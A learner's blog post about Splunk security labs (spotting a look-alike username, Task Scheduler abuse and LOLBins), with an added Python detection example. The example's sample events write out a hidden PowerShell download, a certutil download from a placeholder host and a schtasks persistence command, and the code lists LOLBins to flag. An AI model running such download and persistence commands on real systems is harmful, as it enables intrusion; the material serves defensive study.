Today was packed with labs: one on Splunk dashboards and reports, one focused on an investigation, and another on logging within Splunk.


I was a bit ahead because I’d already completed the dashboard lab over the weekend, so I jumped straight into the investigation. Of course, it turned into another headache. The first task was to identify a user with a suspicious username, an easy win since the name was nearly identical to another user’s, except for one letter being swapped out with a number (classic hacker move).

Then, things got trickier. I had to find the right field to search for the user who was using Windows Task Scheduler to run malicious tasks. It’s one of those sneaky tricks that attackers love: scheduled tasks are often overlooked, making them an ideal way to carry out actions without raising suspicion.

Next, I had to dig even deeper to find a user who executed a system process (aka a LOLBin, Living Off the Land Binary), a term for legitimate system binaries that attackers use to execute malicious actions while blending in with normal system activity. For example, a hacker might use powershell.exe or cmd.exe to download or execute malicious code, making it harder to detect because these are normal processes.
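To make the three hunts above concrete (the look-alike username, the Task Scheduler abuse and the LOLBin launch), here is an added example that is not part of the original post or of any Splunk lab: it runs the same checks in Python over a constructed set of process-creation events in a simplified key=value layout, so the field names and sample values are assumptions, not real Splunk output.

```python
import re
from itertools import combinations

# Constructed sample events (not real Splunk output), one process launch per line.
SAMPLE_EVENTS = r"""
user=jsmith host=WS01 image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"
user=jsm1th host=WS01 image=C:\Windows\System32\schtasks.exe cmdline="schtasks /create /tn Updater /tr C:\Temp\u.exe /sc minute"
user=jsm1th host=WS01 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c Invoke-WebRequest http://example.invalid/a.ps1 -OutFile a.ps1"
user=abrown host=WS02 image=C:\Windows\System32\cmd.exe cmdline="cmd /c dir"
user=abrown host=WS02 image=C:\Windows\System32\certutil.exe cmdline="certutil -urlcache -split -f http://example.invalid/x.exe x.exe"
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Legitimate binaries the post names (plus certutil) that are commonly abused as LOLBins.
LOLBINS = {"powershell.exe", "cmd.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_event(line):
    """Turn one key=value line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def lookalike_pairs(users):
    """Username pairs that differ in exactly one position where a letter
    was swapped for a digit (e.g. jsmith vs jsm1th)."""
    pairs = []
    for a, b in combinations(sorted(set(users)), 2):
        diffs = [(x, y) for x, y in zip(a, b) if x != y]
        if len(a) == len(b) and len(diffs) == 1:
            x, y = diffs[0]
            if (x.isalpha() and y.isdigit()) or (x.isdigit() and y.isalpha()):
                pairs.append((a, b))
    return pairs


def flag_events(events):
    """Return (user, image basename, reason) for scheduled-task creation and
    LOLBin launches whose command line reaches out to a URL."""
    hits = []
    for ev in events:
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("cmdline", "")
        url = URL_RE.search(cmd)
        if image == "schtasks.exe" and "/create" in cmd.lower():
            hits.append((ev["user"], image, "scheduled task created"))
        elif image in LOLBINS and url:
            hits.append((ev["user"], image, "LOLBin contacting " + url.group(0)))
    return hits


def investigate(raw):
    """Run both checks over raw event lines and return the findings."""
    events = [parse_event(line) for line in raw.strip().splitlines()]
    return {"lookalikes": lookalike_pairs(e["user"] for e in events),
            "hits": flag_events(events)}
```

In a real lab the same logic maps onto the fields you searched in Splunk (user, process image, command line); the point is that each hit carries the user it belongs to, which is exactly what the investigation questions asked for.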

It was a bit of a struggle because I still have a lot to learn about operating systems. Today, I finally grasped what a system process actually is. So, I spent a lot of time researching to fill in the gaps in my knowledge. Once I found the malicious file and tracked down the URL that the infected host had connected to, I thought I was done.

But nope, not really. I kept pushing myself with more labs to get as much practice as possible. The more I did, the more I realized I wasn’t yet as comfortable with Splunk as I wanted to be. So, I kept at it. Every investigation was tough and draining, but I knew I had to keep going.


I’ve been doing every lab I can find on Splunk. There are a lot of tough investigations, each one making me want to crawl into bed and sleep for days.

In fact, I didn’t sleep too well last night. Splunk was literally on my mind all night long. I kept running investigations in my dreams. But, on the bright side, day by day, I’m getting more comfortable with it. And now all I want is to feel fully prepared for the final assessment.